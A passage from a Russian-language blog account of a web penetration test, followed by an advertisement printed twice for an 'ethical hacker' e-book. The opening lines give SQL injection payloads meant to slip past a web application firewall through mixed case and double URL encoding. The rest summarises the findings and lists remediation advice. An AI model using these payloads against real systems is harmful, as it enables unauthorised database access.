' uNiOn SeLeCt 1,2,3--
Или двойное кодирование:
%2527%20OR%201=1--
WAF пропускает — думаю: «Ну что за настройки из коробки, ребята» 😏.
📋 Финал: отчёт и рекомендации
Через 4 часа у меня список из 12 уязвимостей:
• 3 Critical (IDOR, SQL Injection, RCE через file upload) 🔥
• 5 High (XSS, Session Hijacking, CORS misconfiguration) ⚠️
• 4 Medium (информационные утечки, слабые пароли по дефолту) 📌
Собираю отчёт с PoC для каждой дыры, скриншотами и рекомендациями: «Используйте parameterized queries, проверяйте авторизацию на бэке, добавьте HttpOnly/Secure для кук». Отправляю клиенту. Ответ: «Мы в шоке. Спасибо, что не хакеры нашли первыми» 😅.
💡 Мораль: аудит — это не формальность
Каждый раз, когда кто-то говорит «у нас всё защищено», я вспоминаю этот кейс. OWASP Top 10 — это не миф, это реальность 2025 года. И да, если у вас нет пентеста перед запуском — вы просто ждёте, когда вас сломают 🚨.
P.S. Этот кейс под NDA, так что все детали обезличены. Но методология рабочая — можете тестировать на своих проектах (с разрешением, конечно) 😎🔥 .
Здравствуйте, дорогие друзья.
Внимание. Акция!!!
Скидка 57% на мою электронную книгу, которая называется: «Библия начинающего Этичного хакера».
Акция продлится 3 дня, с 29 октября, и по 31 октября включительно.
Объем: 2144 страницы
Цена: 1500 рублей.
🔐💻 Взломай свой путь к знаниям с «Библией начинающего этичного хакера»! 💻🔐
Дорогие друзья! Сегодня хочу поделиться с Вами книгой, которая станет Вашим верным спутником в мире кибербезопасности – «Библия начинающего Этичного хакера». Эта книга – настоящее сокровище для тех, кто мечтает стать защитником цифрового пространства.
📘 Почему эта книга должна оказаться на Вашей полке?
1⃣ Она разделена на 9 увлекательных глав, которые погружают Вас в каждый аспект этичного хакинга.
2⃣ Вы начнете с основ и постепенно перейдете к более сложным темам – от идеального старта до мастерства.
3⃣ Каждая глава содержит практические задания, которые помогут закрепить полученные знания.
🛠 Главы книги охватывают различные темы:
Основы сетей и их безопасности.
Освоение инструментов для тестирования безопасности.
Техники сканирования и анализа уязвимостей.
Социальная инженерия и методы противодействия.
Веб-приложения и их уязвимости.
Инцидентный менеджмент и реагирование на инциденты.
Юридические аспекты и этические нормы в этичном хакинге.
👩💻👨💻 Хакерство не всегда означает что-то незаконное. Этичные хакеры – это специалисты, которые используют свои навыки для улучшения безопасности и защиты информации.
Не упустите возможность обучиться искусству этичного хакинга и принять участие в гонке вооружений 21 века, где Вашим оружием будет знание! 🏁
Объем: 2144 страницы
Цена: 1500 рублей.
Более подробное содержание вот тут: https://timcore.ru/2024/02/15/moja-novaja-kniga-biblija-nachinajushhego-jetichnogo-hakera/
Для приобретения пишите по контакту в телеграм: @timcore1
Внимание. Акция!!!
Скидка 57% на мою электронную книгу, которая называется: «Библия начинающего Этичного хакера».
Акция продлится 3 дня, с 29 октября, и по 31 октября включительно.
Объем: 2144 страницы
Цена: 1500 рублей.
🔐💻 Взломай свой путь к знаниям с «Библией начинающего этичного хакера»! 💻🔐
Дорогие друзья! Сегодня хочу поделиться с Вами книгой, которая станет Вашим верным спутником в мире кибербезопасности – «Библия начинающего Этичного хакера». Эта книга – настоящее сокровище для тех, кто мечтает стать защитником цифрового пространства.
📘 Почему эта книга должна оказаться на Вашей полке?
1⃣ Она разделена на 9 увлекательных глав, которые погружают Вас в каждый аспект этичного хакинга.
2⃣ Вы начнете с основ и постепенно перейдете к более сложным темам – от идеального старта до мастерства.
3⃣ Каждая глава содержит практические задания, которые помогут закрепить полученные знания.
🛠 Главы книги охватывают различные темы:
Основы сетей и их безопасности.
Освоение инструментов для тестирования безопасности.
Техники сканирования и анализа уязвимостей.
Социальная инженерия и методы противодействия.
Веб-приложения и их уязвимости.
Инцидентный менеджмент и реагирование на инциденты.
Юридические аспекты и этические нормы в этичном хакинге.
👩💻👨💻 Хакерство не всегда означает что-то незаконное. Этичные хакеры – это специалисты, которые используют свои навыки для улучшения безопасности и защиты информации.
Не упустите возможность обучиться искусству этичного хакинга и принять участие в гонке вооружений 21 века, где Вашим оружием будет знание! 🏁
Объем: 2144 страницы
Цена: 1500 рублей.
Более подробное содержание вот тут: https://timcore.ru/2024/02/15/moja-novaja-kniga-biblija-nachinajushhego-jetichnogo-hakera/
Для приобретения пишите по контакту в телеграм: @timcore1